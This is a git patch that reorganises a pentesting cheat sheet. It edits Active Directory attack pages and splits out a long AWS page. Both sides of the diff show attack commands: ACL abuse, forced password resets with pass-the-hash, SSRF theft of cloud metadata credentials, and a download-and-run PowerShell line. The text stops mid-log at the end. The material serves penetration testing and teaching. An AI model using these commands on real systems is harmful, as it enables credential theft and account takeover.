From e85b723f5e6c2d15fa3a3ac5518bec891e96ec17 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 31 Dec 2023 18:55:37 +0100 Subject: [PATCH] AWS - Pages v0.1 --- .../ad-adcs-certificate-services.md | 13 +- docs/active-directory/ad-adds-acl-ace.md | 42 +- docs/active-directory/ad-adds-enumerate.md | 5 +- docs/active-directory/ad-adds-rodc.md | 4 + .../ad-adfs-federation-services.md | 2 +- docs/cloud/aws/AWS Pentest.md | 632 +----------------- docs/cloud/aws/aws-access-token.md | 85 +++ docs/cloud/aws/aws-cognito.md | 17 + docs/cloud/aws/aws-dynamodb.md | 36 + docs/cloud/aws/aws-ec2.md | 89 +++ docs/cloud/aws/aws-enumeration.md | 117 ++++ docs/cloud/aws/aws-ioc-detection.md | 38 ++ docs/cloud/aws/aws-lambda.md | 15 + docs/cloud/aws/aws-metadata.md | 103 +++ docs/cloud/aws/aws-s3-bucket.md | 41 ++ docs/cloud/aws/aws-ssm.md | 29 + docs/cloud/aws/aws-training.md | 8 + docs/cloud/azure/azure-ad-connect.md | 3 +- 18 files changed, 619 insertions(+), 660 deletions(-) create mode 100644 docs/cloud/aws/aws-access-token.md create mode 100644 docs/cloud/aws/aws-cognito.md create mode 100644 docs/cloud/aws/aws-dynamodb.md create mode 100644 docs/cloud/aws/aws-ec2.md create mode 100644 docs/cloud/aws/aws-enumeration.md create mode 100644 docs/cloud/aws/aws-ioc-detection.md create mode 100644 docs/cloud/aws/aws-lambda.md create mode 100644 docs/cloud/aws/aws-metadata.md create mode 100644 docs/cloud/aws/aws-s3-bucket.md create mode 100644 docs/cloud/aws/aws-ssm.md create mode 100644 docs/cloud/aws/aws-training.md diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index d8c65b3..9e40caa 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -1,9 +1,14 @@ # Active Directory - Certificate Services -* Find ADCS Server - * `crackmapexec ldap domain.lab -u username -p password -M adcs` - * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` -* Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`, `certutil -dump` +Active Directory Certificate Services (AD CS) is a Microsoft Windows server role that provides a public key infrastructure (PKI). It allows you to create, manage, and distribute digital certificates, which are used to secure communication and transactions across a network. + + +## ADCS Enumeration + +* crackmapexec: `crackmapexec ldap domain.lab -u username -p password -M adcs` +* ldapsearch: `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=,OU=Users,DC=domain,DC=local' -w '' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName` +* certutil: `certutil.exe -config - -ping`, `certutil -dump` + ## ESC1 - Misconfigured Certificate Templates diff --git a/docs/active-directory/ad-adds-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md index 072c444..220ff3e 100644 --- a/docs/active-directory/ad-adds-acl-ace.md +++ b/docs/active-directory/ad-adds-acl-ace.md @@ -133,12 +133,9 @@ To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privi * WriteDACL on Group ```powershell - Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 + PowerSploit> Add-DomainObjectAcl -TargetIdentity "INTERESTING_GROUP" -Rights WriteMembers -PrincipalIdentity User1 net group "INTERESTING_GROUP" User1 /add /domain - ``` - Or - ```powershell - bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp + bloodyAD> bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp # Remove right bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setGenericAll devil_user1 cn=INTERESTING_GROUP,dc=corp False @@ -151,7 +148,9 @@ An attacker can update the owner of the target object. Once the object owner has ```powershell Set-DomainObjectOwner -Identity 'target_object' -OwnerIdentity 'controlled_principal' ``` -Or + +Using BloodyAD + ```powershell bloodyAD.py --host my.dc.corp -d corp -u devil_user1 -p P@ssword123 setOwner devil_user1 target_object ``` @@ -166,7 +165,9 @@ An attacker can read the LAPS password of the computer account this ACE applies ```powershell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' ``` + Or for a given computer + ```powershell bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes LAPS_PC$ ms-mcs-admpwd,ms-mcs-admpwdexpirationtime ``` @@ -184,7 +185,9 @@ $mp = $gmsa.'msDS-ManagedPassword' # Decode the data structure using the DSInternals module ConvertFrom-ADManagedPasswordBlob $mp ``` -Or + +Using BloodyAD + ```powershell python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getObjectAttributes gmsaAccount$ msDS-ManagedPassword ``` @@ -192,20 +195,21 @@ python bloodyAD.py -u john.doe -d bloody -p Password512 --host 192.168.10.2 getO ## ForceChangePassword An attacker can change the password of the user this ACE applies to: -* On Windows, this can be achieved with `Set-DomainUserPassword` (PowerView module): -```powershell -$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force -Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword -``` -* On Linux: -```bash -# Using rpcclient from the Samba software suite -rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" +* Windows: + ```powershell + $NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force + Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPassword + ``` -# Using bloodyAD with pass-the-hash -bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd -``` +* Linux: + ```bash + # Using rpcclient from the Samba software suite + rpcclient -U 'attacker_user%my_password' -W DOMAIN -c "setuserinfo2 target_user 23 target_newpwd" + + # Using bloodyAD with pass-the-hash + bloodyAD.py --host [DC IP] -d DOMAIN -u attacker_user -p :B4B9B02E6F09A9BD760F388B67351E2B changePassword target_user target_newpwd + ``` ## References diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md index 12a1fd1..a68c2ba 100644 --- a/docs/active-directory/ad-adds-enumerate.md +++ b/docs/active-directory/ad-adds-enumerate.md @@ -216,11 +216,7 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun #Confirming admin access: Invoke-UserHunter -CheckAccess ``` - :heavy_exclamation_mark: **Priv Esc to Domain Admin with User Hunting:** \ - I have local admin access on a machine -> A Domain Admin has a session on that machine -> I steal his token and impersonate him -> - Profit! - [PowerView 3.0 Tricks](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) ## Using AD Module @@ -319,3 +315,4 @@ You can remotely query every machines on the network to get a list of the users' * [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) * [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) * [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) +* [PowerView 3.0 Tricks - HarmJ0y](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993) \ No newline at end of file diff --git a/docs/active-directory/ad-adds-rodc.md b/docs/active-directory/ad-adds-rodc.md index 34c86a2..d437b9c 100644 --- a/docs/active-directory/ad-adds-rodc.md +++ b/docs/active-directory/ad-adds-rodc.md @@ -13,10 +13,14 @@ RODCs are an alternative for Domain Controllers in less secure physical location ## RODC Key List Attack **Requirements**: + * [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210) * **krbtgt** credentials of the RODC (-rodcKey) * **ID of the krbtgt** account of the RODC (-rodcNo) + +**Exploit**: + * using Impacket ```ps1 # keylistattack.py using SAMR user enumeration without filtering (-full flag) diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md index a07be95..2666a3a 100644 --- a/docs/active-directory/ad-adfs-federation-services.md +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -38,7 +38,7 @@ Other interesting tools to exploit AD FS: -* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) +* [secureworks/whiskeysamlandfriends/WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) - Proof of concept for a Golden SAML attack with Remote ADFS Configuration Extraction. ## References diff --git a/docs/cloud/aws/AWS Pentest.md b/docs/cloud/aws/AWS Pentest.md index be68132..88b6d39 100644 --- a/docs/cloud/aws/AWS Pentest.md +++ b/docs/cloud/aws/AWS Pentest.md @@ -1,389 +1,5 @@ # Cloud - AWS -> Amazon Web Services offers reliable, scalable, and inexpensive cloud computing services. - -## Summary - -- [AWS](#aws) - - [Summary](#summary) - - [Training](#training) - - [Tools](#tools) - - [AWS - Patterns](#aws---patterns) - - [URL Services](#url-services) - - [Access Key ID & Secret](#access-key-id--secret) - - [AWS - Metadata SSRF](#aws---metadata-ssrf) - - [Method for Elastic Cloud Compute (EC2)](#method-for-elastic-cloud-compute-ec2) - - [Method for Container Service (Fargate)](#method-for-container-service-fargate) - - [AWS API calls that return credentials](#aws-api-calls-that-return-credentials) - - [AWS - Shadow Admin](#aws---shadow-admin) - - [Admin equivalent permission](#admin-equivalent-permission) - - [AWS - Gaining AWS Console Access via API Keys](#aws---gaining-aws-console-access-via-api-keys) - - [AWS - Enumerate IAM permissions](#aws---enumerate-iam-permissions) - - [AWS - Mount EBS volume to EC2 Linux](#aws---mount-ebs-volume-to-ec2-linux) - - [AWS - Copy EC2 using AMI Image](#aws---copy-ec2-using-ami-image) - - [AWS - Instance Connect - Push an SSH key to EC2 instance](#aws---instance-connect---push-an-ssh-key-to-ec2-instance) - - [AWS - Lambda - Extract function's code](#aws---lambda---extract-functions-code) - - [AWS - SSM - Command execution](#aws---ssm---command-execution) - - [AWS - Golden SAML Attack](#aws---golden-saml-attack) - - [AWS - Shadow Copy attack](#aws---shadow-copy-attack) - - [Disable CloudTrail](#disable-cloudtrail) - - [Cover tracks by obfuscating Cloudtrail logs and Guard Duty](#cover-tracks-by-obfuscating-cloudtrail-logs-and-guard-duty) - - [DynamoDB](#dynamodb) - - [Security checks](#security-checks) - - [AWSome Pentesting Cheatsheet](#awsome-pentesting-cheatsheet) - - [References](#references) - -## Training - -* CloudFoxable: A Gamified Cloud Hacking Sandbox - https://cloudfoxable.bishopfox.com/ -* AWSGoat : A Damn Vulnerable AWS Infrastructure - https://github.com/ine-labs/AWSGoat -* Damn Vulnerable Cloud Application - https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 -* SadCloud - https://github.com/nccgroup/sadcloud -* Flaws - http://flaws.cloud -* Cloudgoat - https://github.com/RhinoSecurityLabs/cloudgoat - -## Tools - -* [CloudFox](https://github.com/BishopFox/CloudFox/) - Automating situational awareness for cloud penetration tests. Designed for white box enumeration (SecurityAudit/ReadOnly type permission), but can be used for black box (found credentials) as well. - * Either Download the [latest binary release](https://github.com/BishopFox/cloudfox/releases) for your platform, or build it from source. - ``` - git clone https://github.com/BishopFox/cloudfox.git - cd ./cloudfox - go build . - ``` - - * Run all AWS checks: `cloudfox aws --profile [profile-name] all-checks` - * List all AWS checks: `cloudfox aws` - -* [SkyArk](https://github.com/cyberark/SkyArk) - Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins - * Requires read-Only permissions over IAM service - ```powershell - $ git clone https://github.com/cyberark/SkyArk - $ powershell -ExecutionPolicy Bypass -NoProfile - PS C> Import-Module .\SkyArk.ps1 -force - PS C> Start-AWStealth - - or in the Cloud Console - - PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AWStealth/AWStealth.ps1') - PS C> Scan-AWShadowAdmins - ``` - -* [Pacu](https://github.com/RhinoSecurityLabs/pacu) - Exploit configuration flaws within an AWS environment using an extensible collection of modules with a diverse feature-set - * Requires AWS Keys - ```powershell - $ git clone https://github.com/RhinoSecurityLabs/pacu - $ bash install.sh - $ python3 pacu.py - set_keys/swap_keys - ls - run [--keyword-arguments] - run --regions eu-west-1,us-west-1 - - # https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details - ``` - -* [Bucket Finder](https://digi.ninja/projects/bucket_finder.php) - Search for public buckets, list and download all files if directory indexing is enabled - ```powershell - wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2 - ./bucket_finder.rb my_words - ./bucket_finder.rb --region ie my_words - US Standard = http://s3.amazonaws.com - Ireland = http://s3-eu-west-1.amazonaws.com - Northern California = http://s3-us-west-1.amazonaws.com - Singapore = http://s3-ap-southeast-1.amazonaws.com - Tokyo = http://s3-ap-northeast-1.amazonaws.com - - ./bucket_finder.rb --download --region ie my_words - ./bucket_finder.rb --log-file bucket.out my_words - ``` - -* [Boto3](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html) - Amazon Web Services (AWS) SDK for Python - ```python - import boto3 - # Create an S3 client - s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1') - - try: - result = s3.list_buckets() - print(result) - except Exception as e: - print(e) - ``` - -* [Prowler](https://github.com/toniblyx/prowler) - AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness - - > It follows guidelines of the CIS Amazon Web Services Foundations Benchmark and DOZENS of additional checks including GDPR and HIPAA (+100). - * Require: arn:aws:iam::aws:policy/SecurityAudit - - ```powershell - $ pip install awscli ansi2html detect-secrets - $ git clone https://github.com/toniblyx/prowler - $ sudo apt install jq - $ ./prowler -E check42,check43 - $ ./prowler -p custom-profile -r us-east-1 -c check11 - $ ./prowler -A 123456789012 -R ProwlerRole # sts assume-role - ``` - -* [Principal Mapper](https://github.com/nccgroup/PMapper) - A tool for quickly evaluating IAM permissions in AWS - ```powershell - https://github.com/nccgroup/PMapper - pip install principalmapper - pmapper graph --create - pmapper visualize --filetype png - pmapper analysis --output-type text - - # Determine if PowerUser can escalate privileges - pmapper query "preset privesc user/PowerUser" - pmapper argquery --principal user/PowerUser --preset privesc - - # Find all principals that can escalate privileges - pmapper query "preset privesc *" - pmapper argquery --principal '*' --preset privesc - - # Find all principals that PowerUser can access - pmapper query "preset connected user/PowerUser *" - pmapper argquery --principal user/PowerUser --resource '*' --preset connected - - # Find all principals that can access PowerUser - pmapper query "preset connected * user/PowerUser" - pmapper argquery --principal '*' --resource user/PowerUser --preset connected - ``` - -* [ScoutSuite](https://github.com/nccgroup/ScoutSuite/wiki) - Multi-Cloud Security Auditing Tool - ```powershell - $ git clone https://github.com/nccgroup/ScoutSuite - $ python scout.py PROVIDER --help - # The --session-token is optional and only used for temporary credentials (i.e. role assumption). - $ python scout.py aws --access-keys --access-key-id --secret-access-key --session-token - $ python scout.py azure --cli - ``` - -* [s3_objects_check](https://github.com/nccgroup/s3_objects_check) - Whitebox evaluation of effective S3 object permissions, to identify publicly accessible files - ```powershell - $ git clone https://github.com/nccgroup/s3_objects_check - $ python3 -m venv env && source env/bin/activate - $ pip install -r requirements.txt - $ python s3-objects-check.py -h - $ python s3-objects-check.py -p whitebox-profile -e blackbox-profile - ``` - -* [cloudsplaining](https://github.com/salesforce/cloudsplaining) - An AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized report - ```powershell - $ pip3 install --user cloudsplaining - $ cloudsplaining download --profile myawsprofile - $ cloudsplaining scan --input-file default.json - ``` - -* [weirdAAL](https://github.com/carnal0wnage/weirdAAL/wiki) - AWS Attack Library - ```powershell - python3 weirdAAL.py -m ec2_describe_instances -t demo - python3 weirdAAL.py -m lambda_get_account_settings -t demo - python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2' -t yolo - ``` - -* [cloudmapper](https://github.com/duo-labs/cloudmapper.git) - CloudMapper helps you analyze your Amazon Web Services (AWS) environments - ```powershell - git clone https://github.com/duo-labs/cloudmapper.git - # sudo yum install autoconf automake libtool python3-devel.x86_64 python3-tkinter python-pip jq awscli - # You may additionally need "build-essential" - sudo apt-get install autoconf automake libtool python3.7-dev python3-tk jq awscli - pipenv install --skip-lock - pipenv shell - report: Generate HTML report. Includes summary of the accounts and audit findings. - iam_report: Generate HTML report for the IAM information of an account. - audit: Check for potential misconfigurations. - collect: Collect metadata about an account. - find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges - ``` - -* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. - ```bash - # Installation - $ pip install cognito-scanner - # Usage - $ cognito-scanner --help - # Get information about how to use the unwanted account creation script - $ cogntio-scanner account-creation --help - # For more details go to https://github.com/padok-team/cognito-scanner - ``` - -* [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode -* [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access - - - -## AWS - Patterns - -### URL Services - -| Service | URL | -|--------------|-----------------------| -| s3 | https://{user_provided}.s3.amazonaws.com | -| cloudfront | https://{random_id}.cloudfront.net | -| ec2 | ec2-{ip-seperated}.compute-1.amazonaws.com | -| es | https://{user_provided}-{random_id}.{region}.es.amazonaws.com | -| elb | http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 | -| elbv2 | https://{user_provided}-{random_id}.{region}.elb.amazonaws.com | -| rds | mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 | -| rds | postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 | -| route 53 | {user_provided} | -| execute-api | https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} | -| cloudsearch | https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com | -| transfer | sftp://s-{random_id}.server.transfer.{region}.amazonaws.com | -| iot | mqtt://{random_id}.iot.{region}.amazonaws.com:8883 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:8443 | -| iot | https://{random_id}.iot.{region}.amazonaws.com:443 | -| mq | https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162 | -| mq | ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 | -| kafka | b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com | -| kafka | {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com | -| cloud9 | https://{random_id}.vfs.cloud9.{region}.amazonaws.com | -| mediastore | https://{random_id}.data.mediastore.{region}.amazonaws.com | -| kinesisvideo | https://{random_id}.kinesisvideo.{region}.amazonaws.com | -| mediaconvert | https://{random_id}.mediaconvert.{region}.amazonaws.com | -| mediapackage | https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel | - - -### Access Key ID & Secret - -IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key. - -| Prefix | Resource type | -|--------------|-------------------------| -| ABIA | AWS STS service bearer token | -| ACCA | Context-specific credential | -| AGPA | User group | -| AIDA | IAM user | -| AIPA | Amazon EC2 instance profile | -| AKIA | Access key | -| ANPA | Managed policy | -| ANVA | Version in a managed policy | -| APKA | Public key | -| AROA | Role | -| ASCA | Certificate | -| ASIA | Temporary (AWS STS) access key | - -The rest of the string is Base32 encoded and can be used to recover the account id. - -```py -import base64 -import binascii - -def AWSAccount_from_AWSKeyID(AWSKeyID): - - trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix - x = base64.b32decode(trimmed_AWSKeyID) #base32 decode - y = x[0:6] - - z = int.from_bytes(y, byteorder='big', signed=False) - mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False) - - e = (z & mask)>>7 - return (e) - - -print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML"))) -``` - - -## AWS - Metadata SSRF - -> AWS released additional security defences against the attack. - -:warning: Only working with IMDSv1. -Enabling IMDSv2 : `aws ec2 modify-instance-metadata-options --instance-id --profile --http-endpoint enabled --http-token required`. - -In order to use IMDSv2 you must provide a token. - -```powershell -export TOKEN=`curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" "http://169.254.169.254/latest/api/token"` -curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta-data" -``` - -### Method for Elastic Cloud Compute (EC2) - -Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - -1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/ - ```powershell - ami-id - ami-launch-index - ami-manifest-path - block-device-mapping/ - events/ - hostname - iam/ - identity-credentials/ - instance-action - instance-id - ``` -2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/ -3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/ - ```powershell - { - "Code" : "Success", - "LastUpdated" : "2019-07-31T23:08:10Z", - "Type" : "AWS-HMAC", - "AccessKeyId" : "ASIA54BL6PJR37YOEP67", - "SecretAccessKey" : "OiAjgcjm1oi2xxxxxxxxOEXkhOMhCOtJMP2", - "Token" : "AgoJb3JpZ2luX2VjEDU86Rcfd/34E4rtgk8iKuTqwrRfOppiMnv", - "Expiration" : "2019-08-01T05:20:30Z" - } - ``` - -### Method for Container Service (Fargate) - -1. Fetch the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable from https://awesomeapp.com/download?file=/proc/self/environ - ```powershell - JAVA_ALPINE_VERSION=8.212.04-r0 - HOSTNAME=bbb3c57a0ed3SHLVL=1PORT=8443HOME=/root - AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - AWS_EXECUTION_ENV=AWS_ECS_FARGATEMVN_VER=3.3.9JAVA_VERSION=8u212AWS_DEFAULT_REGION=us-west-2 - ECS_CONTAINER_METADATA_URI=http://169.254.170.2/v3/cb4f6285-48f2-4a51-a787-67dbe61c13ffPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/jvm/java-1.8-openjdk/jre/bin:/usr/lib/jvm/java-1.8-openjdk/bin:/usr/lib/mvn:/usr/lib/mvn/binLANG=C.UTF-8AWS_REGION=us-west-2Tag=48111bbJAVA_HOME=/usr/lib/jvm/java-1.8-openjdk/jreM2=/usr/lib/mvn/binPWD=/appM2_HOME=/usr/lib/mvnLD_LIBRARY_PATH=/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64/server:/usr/lib/jvm/java-1.8-openjdk/jre/lib/amd64:/usr/lib/jvm/java-1.8-openjd - ``` -2. Use the credential URL to dump the AccessKey and SecretKey : https://awesomeapp.com/forward?target=http://169.254.170.2/v2/credentials/d22070e0-5f22-4987-ae90-1cd9bec3f447 - ```powershell - { - "RoleArn": "arn:aws:iam::953574914659:role/awesome-waf-role", - "AccessKeyId": "ASIA54BL6PJR2L75XHVS", - "SecretAccessKey": "j72eTy+WHgIbO6zpe2DnfjEhbObuTBKcemfrIygt", - "Token": "FQoGZXIvYXdzEMj//////////wEaDEQW+wwBtaoyqH5lNSLGBF3PnwnLYa3ggfKBtLMoWCEyYklw6YX85koqNwKMYrP6ymcjv4X2gF5enPi9/Dx6m/1TTFIwMzZ3tf4V3rWP3HDt1ea6oygzTrWLvfdp57sKj+2ccXI+WWPDZh3eJr4Wt4JkiiXrWANn7Bx3BUj9ZM11RXrKRCvhrxdrMLoewRkWmErNEOFgbaCaT8WeOkzqli4f+Q36ZerT2V+FJ4SWDX1CBsimnDAMAdTIRSLFxVBBwW8171OHiBOYAMK2np1xAW1d3UCcZcGKKZTjBee2zs5+Rf5Nfkoq+j7GQkmD2PwCeAf0RFETB5EVePNtlBWpzfOOVBtsTUTFewFfx5cyNsitD3C2N93WR59LX/rNxyncHGDUP/6UPlasOcfzAaG738OJQmWfQTR0qksHIc2qiPtkstnNndh76is+r+Jc4q3wOWu2U2UBi44Hj+OS2UTpMAwc/MshIiGsUOrBQdPqcLLdAxKpUNTdSQNLg5wv4f2OrOI8/sneV58yBRolBz8DZoH8wohtLXpueDt8jsVSVLznnMOOe/4ehHE2Nt+Fy+tjaY5FUi/Ijdd5IrIdIvWFHY1XcPopUFYrDqr0yuZvX1YddfIcfdbmxf274v69FuuywXTo7cXk1QTMYZWlD/dPI/k6KQeO446UrHT9BJxcJMpchAIVRpI7nVKkSDwku1joKUG7DOeycuAbhecVZG825TocL0ks2yXPnIdvckAaU9DZf+afIV3Nxv3TI4sSX1npBhb2f/8C31pv8VHyu2NiN5V6OOHzZijHsYXsBQ==", - "Expiration": "2019-09-18T04:05:59Z" - } - ``` - - -### AWS API calls that return credentials - -- chime:createapikey -- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html) -- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html) -- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html) -- [cognito-identity:getcredentialsforidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetCredentialsForIdentity.html) -- [connect:getfederationtoken](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [connect:getfederationtokens](https://docs.aws.amazon.com/connect/latest/APIReference/API_GetFederationToken.html) -- [ecr:getauthorizationtoken](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/API_GetAuthorizationToken.html) -- [gamelift:requestuploadcredentials](https://docs.aws.amazon.com/gamelift/latest/apireference/API_RequestUploadCredentials.html) -- [iam:createaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateAccessKey.html) -- [iam:createloginprofile](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateLoginProfile.html) -- [iam:createservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateServiceSpecificCredential.html) -- [iam:resetservicespecificcredential](https://docs.aws.amazon.com/IAM/latest/APIReference/API_ResetServiceSpecificCredential.html) -- [iam:updateaccesskey](https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateAccessKey.html) -- [lightsail:getinstanceaccessdetails](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetInstanceAccessDetails.html) -- [lightsail:getrelationaldatabasemasteruserpassword](https://docs.aws.amazon.com/lightsail/2016-11-28/api-reference/API_GetRelationalDatabaseMasterUserPassword.html) -- [rds-db:connect](https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.IAMPolicy.html) -- [redshift:getclustercredentials](https://docs.aws.amazon.com/redshift/latest/APIReference/API_GetClusterCredentials.html) -- [sso:getrolecredentials](https://docs.aws.amazon.com/singlesignon/latest/PortalAPIReference/API_GetRoleCredentials.html) -- [mediapackage:rotatechannelcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-credentials.html) -- [mediapackage:rotateingestendpointcredentials](https://docs.aws.amazon.com/mediapackage/latest/apireference/channels-id-ingest_endpoints-ingest_endpoint_id-credentials.html) -- [sts:assumerole](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role.html) -- [sts:assumerolewithsaml](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-saml.html) -- [sts:assumerolewithwebidentity](https://docs.aws.amazon.com/cli/latest/reference/sts/assume-role-with-web-identity.html) -- [sts:getfederationtoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-federation-token.html) -- [sts:getsessiontoken](https://docs.aws.amazon.com/cli/latest/reference/sts/get-session-token.html) - - ## AWS - Shadow Admin ### Admin equivalent permission @@ -504,114 +120,6 @@ $> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED] https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED ``` -## AWS - Enumerate IAM permissions - -Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam) - -```powershell -git clone git@github.com:andresriancho/enumerate-iam.git -pip install -r requirements.txt -./enumerate-iam.py --access-key AKIA... --secret-key StF0q... -2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..." -2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked! -2019-05-10 15:58:01,537 - 21345 - [INFO] -- { - "RoleDetailList": [ - { - "Tags": [], - "AssumeRolePolicyDocument": { - "Version": "2008-10-17", - "Statement": [ - { -... -2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked! -2019-05-10 